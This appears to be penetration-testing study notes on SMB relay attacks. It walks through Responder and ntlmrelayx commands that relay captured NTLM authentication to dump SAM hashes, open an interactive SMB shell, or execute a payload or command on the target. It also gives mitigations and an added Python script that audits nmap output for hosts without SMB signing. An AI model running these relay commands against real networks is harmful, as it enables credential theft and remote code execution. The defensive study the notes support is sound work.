SMB Relay

What is SMB Relay?

  • Instead of cracking the hashes captured with Responder, we can relay them to specific machines and potentially gain access

  • Requirements

    • SMB signing must be disabled on the target

    • The relayed user must be a local admin on the target machine

Attack Procedure

  • Configure Responder (/etc/responder/Responder.conf) to capture SMB and HTTP requests without responding to them.

# Check for SMB signing disabled (or enabled but not required)
nmap --script=smb2-security-mode.nse -p 445 IP_SUBNET

# Configure Responder - turn off the SMB and HTTP servers so it captures but does not respond
nano /etc/responder/Responder.conf

# Start Responder
responder -I eth0 -dwv

# Set up the relay (targets.txt = hosts from the nmap check that do not require signing)
python ntlmrelayx.py -tf targets.txt -smb2support

# A victim attempts to connect to an SMB share at the attacking IP; the authentication is relayed
\\ATTACKING_IP

# With no other options, a successful relay dumps the target's SAM hashes

# Get an interactive SMB shell on the target instead of a SAM dump
ntlmrelayx.py -tf targets.txt -smb2support -i

# Once you have an interactive SMB shell you have a lot of control

# Additional options
# Execute a payload on the target, e.g. a msfvenom executable with a multi/handler listener in Metasploit
ntlmrelayx.py -tf targets.txt -smb2support -e payload.exe

# Execute a single command on the target once the relay succeeds, e.g. a PowerShell one-liner
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Mitigation Strategies

  • Enable SMB Signing on all devices

    • Pro: Completely stops the attack

    • Con: Can cause performance issues with file copies

  • Disable NTLM authentication on network

    • Pro: Completely stops the attack

    • Con: If Kerberos stops working, Windows defaults back to NTLM

  • Account tiering:

    • Pro: Limits domain admin accounts to specific tasks (they log on only to servers that require DA)

    • Con: Enforcing the policy may be difficult

  • Local admin restriction:

    • Pro: Can prevent a lot of lateral movement

    • Con: Potential increase in the amount of service desk tickets
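As an added example that is not part of the original notes: a small Python audit script that parses the XML output (-oX) of the nmap smb2-security-mode check used above and lists the hosts that still accept unsigned SMB sessions, i.e. the machines the "Enable SMB Signing" mitigation has not yet reached. The sample XML and its addresses are constructed, and the script assumes the status sentences match the phrasing nmap's script prints.

```python
"""Audit nmap smb2-security-mode XML (-oX) for hosts that accept unsigned SMB sessions."""
import xml.etree.ElementTree as ET

# Constructed sample output, trimmed to the elements this script reads; hosts are made up.
# Host .40 answered on 445 but returned no script result, an edge case real scans produce.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
  <host><address addr="10.0.0.10" addrtype="ipv4"/><hostscript><script id="smb2-security-mode"
    output="&#xa;  3.1.1: &#xa;    Message signing enabled and required&#xa;"/></hostscript></host>
  <host><address addr="10.0.0.20" addrtype="ipv4"/><hostscript><script id="smb2-security-mode"
    output="&#xa;  3.1.1: &#xa;    Message signing enabled but not required&#xa;"/></hostscript></host>
  <host><address addr="10.0.0.30" addrtype="ipv4"/><hostscript><script id="smb2-security-mode"
    output="&#xa;  2.1: &#xa;    Message signing is disabled and not required!&#xa;"/></hostscript></host>
  <host><address addr="10.0.0.40" addrtype="ipv4"/></host>
</nmaprun>"""

# Only "required" defeats relay; the other two states accept unsigned sessions.
RELAYABLE = {"not_required", "disabled"}

def classify(output: str) -> str:
    """Map the script's status sentence (phrasing assumed to match nmap's) to a status."""
    text = output.lower()
    if "enabled and required" in text:
        return "required"
    if "enabled but not required" in text:
        return "not_required"
    if "disabled" in text:
        return "disabled"
    return "unknown"

def parse_signing(xml_text: str) -> list[tuple[str, str, str]]:
    """Return (address, negotiated dialect, status) for every host in the scan."""
    results = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        script = host.find("hostscript/script[@id='smb2-security-mode']")
        if script is None:  # no result: report it rather than silently treating it as safe
            results.append((addr, "", "unknown"))
            continue
        output = script.get("output", "")
        # The first "x.y.z:" token in the output is the dialect the scanner negotiated.
        dialect = next((t[:-1] for t in output.split() if t.endswith(":")), "")
        results.append((addr, dialect, classify(output)))
    return results

def needs_signing_enforced(xml_text: str) -> list[str]:
    """Addresses on which the 'Enable SMB Signing' mitigation has not yet landed."""
    return [addr for addr, _, status in parse_signing(xml_text) if status in RELAYABLE]
```

Feed it the contents of a real scan saved with `nmap --script=smb2-security-mode -p 445 -oX scan.xml IP_SUBNET`; hosts reported as "unknown" need a manual look rather than being assumed safe.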
